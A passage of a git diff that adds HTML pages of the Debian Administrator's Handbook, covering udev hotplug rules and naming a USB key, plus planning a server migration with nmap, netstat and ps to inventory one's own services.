+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.backup.html"
+        title="9.10. Backup" /><link
+        rel="next"
+        href="sect.power-management.html"
+        title="9.12. Power Management: Advanced Configuration and Power Interface (ACPI)" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.hotplug.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.backup.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.power-management.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.hotplug"></a>9.11. Hot Plugging: <span
+                  class="emphasis"><em>hotplug</em></span></h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.2"></a>9.11.1. Introduction</h3></div></div></div><div
+            class="para">
+				The <span
+              class="emphasis"><em>hotplug</em></span> kernel subsystem dynamically handles the addition and removal of devices, by loading the appropriate drivers and by creating the corresponding device files (with the help of <code
+              class="command">udevd</code>). With modern hardware and virtualization, almost everything can be hotplugged: from the usual USB/PCMCIA/IEEE 1394 peripherals to SATA hard drives, but also the CPU and the memory.
+			</div><div
+            class="para">
+				The kernel has a database that associates each device ID with the required driver. This database is used during boot to load all the drivers for the peripheral devices detected on the different buses, but also when an additional hotplug device is connected. Once the device is ready for use, a message is sent to <code
+              class="command">udevd</code> so it will be able to create the corresponding entry in <code
+              class="filename">/dev/</code>.
+			</div><a
+            id="id-1.12.14.2.4"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.5"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.6"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.7"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.8"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.9"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.3"></a>9.11.2. The Naming Problem</h3></div></div></div><div
+            class="para">
+				Before the appearance of hotplug connections, it was easy to assign a fixed name to a device. It was based simply on the position of the devices on their respective bus. But this is not possible when such devices can come and go on the bus. The typical case is the use of a digital camera and a USB key, both of which appear to the computer as disk drives. The first one connected may be <code
+              class="filename">/dev/sdb</code> and the second <code
+              class="filename">/dev/sdc</code> (with <code
+              class="filename">/dev/sda</code> representing the computer's own hard drive). The device name is not fixed; it depends on the order in which devices are connected.
+			</div><div
+            class="para">
+				Additionally, more and more drivers use dynamic values for devices' major/minor numbers, which makes it impossible to have static entries for the given devices, since these essential characteristics may vary after a reboot.
+			</div><div
+            class="para">
+				<span
+              class="emphasis"><em>udev</em></span> was created precisely to solve this problem.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.4"></a>9.11.3. How <span
+                    class="emphasis"><em>udev</em></span> Works</h3></div></div></div><div
+            class="para">
+				When <span
+              class="emphasis"><em>udev</em></span> is notified by the kernel of the appearance of a new device, it collects various information on the given device by consulting the corresponding entries in <code
+              class="filename">/sys/</code>, especially those that uniquely identify it (MAC address for a network card, serial number for some USB devices, etc.).
+			</div><div
+            class="para">
+				Armed with all of this information, <span
+              class="emphasis"><em>udev</em></span> then consults all of the rules contained in <code
+              class="filename">/etc/udev/rules.d/</code> and <code
+              class="filename">/lib/udev/rules.d/</code>. In this process it decides how to name the device, what symbolic links to create (to give it alternative names), and what commands to execute. All of these files are consulted, and the rules are all evaluated sequentially (except when a file uses “GOTO” directives). Thus, there may be several rules that correspond to a given event.
+			</div><div
+            class="para">
+				The syntax of rules files is quite simple: each row contains selection criteria and variable assignments. The former are used to select events for which there is a need to react, and the latter defines the action to take. They are all simply separated with commas, and the operator implicitly differentiates between a selection criterion (with comparison operators, such as <code
+              class="literal">==</code> or <code
+              class="literal">!=</code>) or an assignment directive (with operators such as <code
+              class="literal">=</code>, <code
+              class="literal">+=</code> or <code
+              class="literal">:=</code>).
+			</div><div
+            class="para">
+				Comparison operators are used on the following variables:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">KERNEL</code>: the name that the kernel assigns to the device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ACTION</code>: the action corresponding to the event (“add” when a device has been added, “remove” when it has been removed);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">DEVPATH</code>: the path of the device's <code
+                    class="filename">/sys/</code> entry;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SUBSYSTEM</code>: the kernel subsystem which generated the request (there are many, but a few examples are “usb”, “ide”, “net”, “firmware”, etc.);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ATTR{<em
+                      class="replaceable">attribute</em>}</code>: file contents of the <em
+                    class="replaceable">attribute</em> file in the <code
+                    class="filename">/sys/<em
+                      class="replaceable">$devpath</em>/</code> directory of the device. This is where you find the MAC address and other bus specific identifiers;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">KERNELS</code>, <code
+                    class="literal">SUBSYSTEMS</code> and <code
+                    class="literal">ATTRS{<em
+                      class="replaceable">attributes</em>}</code> are variations that will try to match the different options on one of the parent devices of the current device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">PROGRAM</code>: delegates the test to the indicated program (true if it returns 0, false if not). The content of the program's standard output is stored so that it can be reused by the <code
+                    class="literal">RESULT</code> test;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">RESULT</code>: execute tests on the standard output stored during the last call to <code
+                    class="literal">PROGRAM</code>.
+					</div></li></ul></div><div
+            class="para">
+				The right operands can use pattern expressions to match several values at the same time. For instance, <code
+              class="literal">*</code> matches any string (even an empty one); <code
+              class="literal">?</code> matches any character, and <code
+              class="literal">[]</code> matches the set of characters listed between the square brackets (or the opposite thereof if the first character is an exclamation point, and contiguous ranges of characters are indicated like <code
+              class="literal">a-z</code>).
+			</div><div
+            class="para">
+				Regarding the assignment operators, <code
+              class="literal">=</code> assigns a value (and replaces the current value); in the case of a list, it is emptied and contains only the value assigned. <code
+              class="literal">:=</code> does the same, but prevents later changes to the same variable. As for <code
+              class="literal">+=</code>, it adds an item to a list. The following variables can be changed:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">NAME</code>: the device filename to be created in <code
+                    class="filename">/dev/</code>. Only the first assignment counts; the others are ignored;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SYMLINK</code>: the list of symbolic links that will point to the same device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">OWNER</code>, <code
+                    class="literal">GROUP</code> and <code
+                    class="literal">MODE</code> define the user and group that owns the device, as well as the associated permission;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">RUN</code>: the list of programs to execute in response to this event.
+					</div></li></ul></div><div
+            class="para">
+				The values assigned to these variables may use a number of substitutions:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$kernel</code> or <code
+                    class="literal">%k</code>: equivalent to <code
+                    class="literal">KERNEL</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$number</code> or <code
+                    class="literal">%n</code>: the order number of the device, for example, for <code
+                    class="literal">sda3</code>, it would be “3”;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$devpath</code> or <code
+                    class="literal">%p</code>: equivalent to <code
+                    class="literal">DEVPATH</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$attr{<em
+                      class="replaceable">attribute</em>}</code> or <code
+                    class="literal">%s{<em
+                      class="replaceable">attribute</em>}</code>: equivalent to <code
+                    class="literal">ATTRS{<em
+                      class="replaceable">attribute</em>}</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$major</code> or <code
+                    class="literal">%M</code>: the kernel major number of the device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$minor</code> or <code
+                    class="literal">%m</code>: the kernel minor number of the device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$result</code> or <code
+                    class="literal">%c</code>: the string output by the last program invoked by <code
+                    class="literal">PROGRAM</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						and, finally, <code
+                    class="literal">%%</code> and <code
+                    class="literal">$$</code> for the percent and dollar sign, respectively.
+					</div></li></ul></div><div
+            class="para">
+				The above lists are not complete (they include only the most important parameters), but the <span
+              class="citerefentry"><span
+                class="refentrytitle">udev</span>(7)</span> manual page should be exhaustive.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.5"></a>9.11.4. A concrete example</h3></div></div></div><div
+            class="para">
+				Let us consider the case of a simple USB key and try to assign it a fixed name. First, you must find the elements that will identify it in a unique manner. For this, plug it in and run <code
+              class="command">udevadm info -a -n /dev/sdc</code> (replacing <em
+              class="replaceable">/dev/sdc</em> with the actual name assigned to the key).
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>udevadm info -a -n /dev/sdc</code></strong>
+<code
+              class="computeroutput">[...]
+  looking at device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0/block/sdc':
+    KERNEL=="sdc"
+    SUBSYSTEM=="block"
+    DRIVER==""
+    ATTR{range}=="16"
+    ATTR{ext_range}=="256"
+    ATTR{removable}=="1"
+    ATTR{ro}=="0"
+    ATTR{size}=="126976"
+    ATTR{alignment_offset}=="0"
+    ATTR{capability}=="53"
+    ATTR{stat}=="      51      100     1208      256        0        0        0        0        0      192      25        6"
+    ATTR{inflight}=="       0        0"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="scsi"
+    DRIVERS=="sd"
+    ATTRS{device_blocked}=="0"
+    ATTRS{type}=="0"
+    ATTRS{scsi_level}=="3"
+    ATTRS{vendor}=="I0MEGA  "
+    ATTRS{model}=="UMni64MB*IOM2C4 "
+    ATTRS{rev}=="    "
+    ATTRS{state}=="running"
+[...]
+    ATTRS{max_sectors}=="240"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="usb"
+    DRIVERS=="usb"
+    ATTRS{configuration}=="iCfg"
+    ATTRS{bNumInterfaces}==" 1"
+    ATTRS{bConfigurationValue}=="1"
+    ATTRS{bmAttributes}=="80"
+    ATTRS{bMaxPower}=="100mA"
+    ATTRS{urbnum}=="398"
+    ATTRS{idVendor}=="4146"
+    ATTRS{idProduct}=="4146"
+    ATTRS{bcdDevice}=="0100"
+[...]
+    ATTRS{manufacturer}=="USB Disk"
+    ATTRS{product}=="USB Mass Storage Device"
+    ATTRS{serial}=="M004021000001"
+[...]
+</code></pre><div
+            class="para">
+				To create a new rule, you can use tests on the device's variables, as well as those of one of the parent devices. The above case allows us to create two rules like these:
+			</div><pre
+            class="programlisting">KERNEL=="sd?", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/disk"
+KERNEL=="sd?[0-9]", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/part%n"
+</pre><div
+            class="para">
+				Once these rules are set in a file, named for example <code
+              class="filename">/etc/udev/rules.d/010_local.rules</code>, you can simply remove and reconnect the USB key. You can then see that <code
+              class="filename">/dev/usb_key/disk</code> represents the disk associated with the USB key, and <code
+              class="filename">/dev/usb_key/part1</code> is its first partition.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Debugging <span
+                        class="emphasis"><em>udev</em></span>'s configuration</strong></p></div></div></div><div
+              class="para">
+				Like many daemons, <code
+                class="command">udevd</code> stores logs in <code
+                class="filename">/var/log/daemon.log</code>. But it is not very verbose by default, and it is usually not enough to understand what is happening. The <code
+                class="command">udevadm control --log-priority=info</code> command increases the verbosity level and solves this problem. <code
+                class="command">udevadm control --log-priority=err</code> returns to the default verbosity level.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.backup.html"><strong>Předcházející</strong>9.10. Backup</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.power-management.html"><strong>Další</strong>9.12. Power Management: Advanced Configuration an...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.how-to-migrate.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.how-to-migrate.html
new file mode 100644
index 000000000..be05205b1
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.how-to-migrate.html
@@ -0,0 +1,303 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">3.2. How To Migrate</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Existing Setup, Reuse, Migration" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="existing-setup.html"
+        title="Kapitola 3. Analyzing the Existing Setup and Migrating" /><link
+        rel="prev"
+        href="existing-setup.html"
+        title="Kapitola 3. Analyzing the Existing Setup and Migrating" /><link
+        rel="next"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.how-to-migrate.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="existing-setup.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="installation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.how-to-migrate"></a>3.2. How To Migrate</h2></div></div></div><a
+          id="id-1.6.5.2"
+          class="indexterm"></a><div
+          class="para">
+			In order to guarantee continuity of the services, each computer migration must be planned and executed according to the plan. This principle applies whatever the operating system used.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.4"></a>3.2.1. Survey and Identify Services</h3></div></div></div><div
+            class="para">
+				As simple as it seems, this step is essential. A serious administrator truly knows the principal roles of each server, but such roles can change, and sometimes experienced users may have installed “wild” services. Knowing that they exist will at least allow you to decide what to do with them, rather than delete them haphazardly.
+			</div><div
+            class="para">
+				For this purpose, it is wise to inform your users of the project before migrating the server. To involve them in the project, it may be useful to install the most common free software programs on their desktops prior to migration, which they will come across again after the migration to Debian; Libre Office and the Mozilla suite are the best examples here.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.5.4.4"></a>3.2.1.1. Network and Processes</h4></div></div></div><a
+              id="id-1.6.5.4.4.2"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="command">nmap</code> tool (in the package with the same name) will quickly identify Internet services hosted by a network connected machine without even requiring to log in to it. Simply call the following command on another machine connected to the same network:
+				</div><pre
+              class="screen">
+<code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>nmap mirwiz</code></strong>
+<code
+                class="computeroutput">Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-06 14:41 CEST
+Nmap scan report for mirwiz (192.168.1.104)
+Host is up (0.00062s latency).
+Not shown: 992 closed ports
+PORT     STATE SERVICE
+22/tcp   open  ssh
+25/tcp   open  smtp
+80/tcp   open  http
+111/tcp  open  rpcbind
+139/tcp  open  netbios-ssn
+445/tcp  open  microsoft-ds
+5666/tcp open  nrpe
+9999/tcp open  abyss
+
+Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds</code></pre><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>ALTERNATIVE</em></span> Use <code
+                          class="command">netstat</code> to find the list of available services</strong></p></div></div></div><div
+                class="para">
+					On a Linux machine, the <code
+                  class="command">netstat -tupan</code> command will show the list of active or pending TCP sessions, as well UDP ports on which running programs are listening. This facilitates identification of services offered on the network.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> IPv6</strong></p></div></div></div><div
+                class="para">
+					Some network commands may work either with IPv4 (the default usually) or with IPv6. These include the <code
+                  class="command">nmap</code> and <code
+                  class="command">netstat</code> commands, but also others, such as <code
+                  class="command">route</code> or <code
+                  class="command">ip</code>. The convention is that this behavior is enabled by the <em
+                  class="parameter"><code>-6</code></em> command-line option.
+				</div></div><div
+              class="para">
+					If the server is a Unix machine offering shell accounts to users, it is interesting to determine if processes are executed in the background in the absence of their owner. The command <code
+                class="command">ps auxw</code> displays a list of all processes with their user identity. By checking this information against the output of the <code
+                class="command">who</code> command, which gives a list of logged in users, it is possible to identify rogue or undeclared servers or programs running in the background. Looking at <code
+                class="filename">crontabs</code> (tables listing automatic actions scheduled by users) will often provide interesting information on functions fulfilled by the server (a complete explanation of <code
+                class="command">cron</code> is available in <a
+                class="xref"
+                href="sect.task-scheduling-cron-atd.html">9.7 – „Scheduling Tasks with <code
+                  class="command">cron</code> and <code
+                  class="command">atd</code>“</a>).
+				</div><div
+              class="para">
+					In any case, it is essential to backup your servers: this allows recovery of information after the fact, when users will report specific problems due to the migration.
+				</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.5"></a>3.2.2. Backing up the Configuration</h3></div></div></div><div
+            class="para">
+				It is wise to retain the configuration of every identified service in order to be able to install the equivalent on the updated server. The bare minimum is to make a backup copy of the configuration files.
+			</div><div
+            class="para">
+				For Unix machines, the configuration files are usually found in <code
+              class="filename">/etc/</code>, but they may be located in a sub-directory of <code
+              class="filename">/usr/local/</code>. This is the case if a program has been installed from sources, rather than with a package. In some cases, one may also find them under <code
+              class="filename">/opt/</code>.
+			</div><div
+            class="para">
+				For data managing services (such as databases), it is strongly recommended to export the data to a standard format that will be easily imported by the new software. Such a format is usually in text mode and documented; it may be, for example, an SQL dump for a database, or an LDIF file for an LDAP server.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.6.5.5.5"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/existing-setup-2.png"
+                  alt="Database backups" /></div></div><p
+              class="title"><strong>Obrázek 3.2. Database backups</strong></p></div><div
+            class="para">
+				Each server software is different, and it is impossible to describe all existing cases in detail. Compare the documentation for the existing and the new software to identify the exportable (thus, re-importable) portions and those which will require manual handling. Reading this book will clarify the configuration of the main Linux server programs.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.6"></a>3.2.3. Taking Over an Existing Debian Server</h3></div></div></div><a
+            id="id-1.6.5.6.2"
+            class="indexterm"></a><a
+            id="id-1.6.5.6.3"
+            class="indexterm"></a><a
+            id="id-1.6.5.6.4"
+            class="indexterm"></a><div
+            class="para">
+				To effectively take over its maintenance, one may analyze a machine already running with Debian.
+			</div><div
+            class="para">
+				The first file to check is <code
+              class="filename">/etc/debian_version</code>, which usually contains the version number for the installed Debian system (it is part of the <span
+              class="emphasis"><em>base-files</em></span> package). If it indicates <code
+              class="literal"><em
+                class="replaceable">codename</em>/sid</code>, it means that the system was updated with packages coming from one of the development distributions (either testing or unstable).
+			</div><div
+            class="para">
+				The <code
+              class="command">apt-show-versions</code> program (from the Debian package of the same name) checks the list of installed packages and identifies the available versions. <code
+              class="command">aptitude</code> can also be used for these tasks, albeit in a less systematic manner.
+			</div><div
+            class="para">
+				A glance at the <code
+              class="filename">/etc/apt/sources.list</code> file (and <code
+              class="filename">/etc/apt/sources.list.d/</code> directory) will show where the installed Debian packages likely came from. If many unknown sources appear, the administrator may choose to completely reinstall the computer's system to ensure optimal compatibility with the software provided by Debian.
+			</div><div
+            class="para">
+				The <code
+              class="filename">sources.list</code> file is often a good indicator: the majority of administrators keep, at least in comments, the list of APT sources that were previously used. But you should not forget that sources used in the past might have been deleted, and that some random packages grabbed on the Internet might have been manually installed (with the <code
+              class="command">dpkg</code> command). In this case, the machine is misleading in its appearance of “standard” Debian. This is why you should pay attention to any indication that will give away the presence of external packages (appearance of <code
+              class="filename">deb</code> files in unusual directories, package version numbers with a special suffix indicating that it originated from outside the Debian project, such as <code
+              class="literal">ubuntu</code> or <code
+              class="literal">lmde</code>, etc.)
+			</div><div
+            class="para">
+				Likewise, it is interesting to analyze the contents of the <code
+              class="filename">/usr/local/</code> directory, whose purpose is to contain programs compiled and installed manually. Listing software installed in this manner is instructive, since this raises questions on the reasons for not using the corresponding Debian package, if such a package exists.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>QUICK LOOK</em></span> <span
+                        class="pkg pkg">cruft</span></strong></p></div></div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">cruft</span> package proposes to list the available files that are not owned by any package. It has some filters (more or less effective, and more or less up to date) to avoid reporting some legitimate files (files generated by Debian packages, or generated configuration files not managed by <code
+                class="command">dpkg</code>, etc.).
+			</div><div
+              class="para">
+				Be careful to not blindly delete everything that <code
+                class="command">cruft</code> might list!
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.7"></a>3.2.4. Installing Debian</h3></div></div></div><div
+            class="para">
+				Once all the required information on the current server is known, we can shut it down and begin to install Debian on it.
+			</div><a
+            id="id-1.6.5.7.3"
+            class="indexterm"></a><div
+            class="para">
+				To choose the appropriate version, we must know the computer's architecture. If it is a reasonably recent PC, it is most likely to be amd64 (older PCs were usually i386). In other cases, we can narrow down the possibilities according to the previously used system.
+			</div><div
+            class="para">
+				<a
+              class="xref"
+              href="sect.how-to-migrate.html#tab-corresp">3.1</a> is not intended to be exhaustive, but may be helpful. In any case, the original documentation for the computer is the most reliable source to find this information.
+			</div><div
+            class="table"><a
+              xmlns=""
+              id="tab-corresp"></a><p
+              class="title"><strong>Tabulka 3.1. Matching operating system and architecture</strong></p><div
+              class="table-contents"><table
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="lt-4-cols gt-7-rows"
+                summary="Matching operating system and architecture"><colgroup><col /><col /></colgroup><thead><tr><th>Operating System</th><th>Architecture(s)</th></tr></thead><tbody><tr><td>DEC Unix (OSF/1)</td><td>alpha, mipsel</td></tr><tr><td>HP Unix</td><td>ia64, hppa</td></tr><tr><td>IBM AIX</td><td>powerpc</td></tr><tr><td>Irix</td><td>mips</td></tr><tr><td>OS X</td><td>amd64, powerpc, i386</td></tr><tr><td>z/OS, MVS</td><td>s390x, s390</td></tr><tr><td>Solaris, SunOS</td><td>sparc, i386, m68k</td></tr><tr><td>Ultrix</td><td>mips</td></tr><tr><td>VMS</td><td>alpha</td></tr><tr><td>Windows 95/98/ME</td><td>i386</td></tr><tr><td>Windows NT/2000</td><td>i386, alpha, ia64, mipsel</td></tr><tr><td>Windows XP / Windows Server 2008</td><td>i386, amd64, ia64</td></tr><tr><td>Windows RT</td><td>armel, armhf, arm64</td></tr><tr><td>Windows Vista / Windows 7-8-10</td><td>i386, amd64</td></tr></tbody></table></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>HARDWARE</em></span> 64 bit PC vs 32 bit PC</strong></p></div></div></div><a
+              id="id-1.6.5.7.7.2"
+              class="indexterm"></a><a
+              id="id-1.6.5.7.7.3"
+              class="indexterm"></a><div
+              class="para">
+				Most recent computers have 64 bit Intel or AMD processors, compatible with older 32 bit processors; the software compiled for “i386” architecture thus works. On the other hand, this compatibility mode does not fully exploit the capabilities of these new processors. This is why Debian provides the “amd64” architecture, which works for recent AMD chips as well as Intel “em64t” processors (including most of the Core series), which are very similar to AMD64.
+			</div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.8"></a>3.2.5. Installing and Configuring the Selected Services</h3></div></div></div><div
+            class="para">
+				Once Debian is installed, we must install and configure one by one all of the services that this computer must host. The new configuration must take into consideration the prior one in order to ensure a smooth transition. All the information collected in the first two steps will be useful to successfully complete this part.
+			</div><div
+            class="figure"><a
+              xmlns=""
+              id="id-1.6.5.8.3"></a><div
+              class="figure-contents"><div
+                class="mediaobject"><img
+                  src="images/existing-setup-4.png"
+                  alt="Install the selected services" /></div></div><p
+              class="title"><strong>Obrázek 3.3. Install the selected services</strong></p></div><div
+            class="para">
+				Prior to jumping into this exercise with both feet, it is strongly recommended that you read the remainder of this book. After that you will have a more precise understanding of how to configure the expected services.
+			</div><div
+            class="para">
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="existing-setup.html"><strong>Předcházející</strong>Kapitola 3. Analyzing the Existing Setup and Migr...</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="installation.html"><strong>Další</strong>Kapitola 4. Installation</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-ftp-proxy.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-ftp-proxy.html
new file mode 100644
index 000000000..48a2abb17
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.http-ftp-proxy.html
@@ -0,0 +1,201 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">11.6. HTTP/FTP Proxy</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
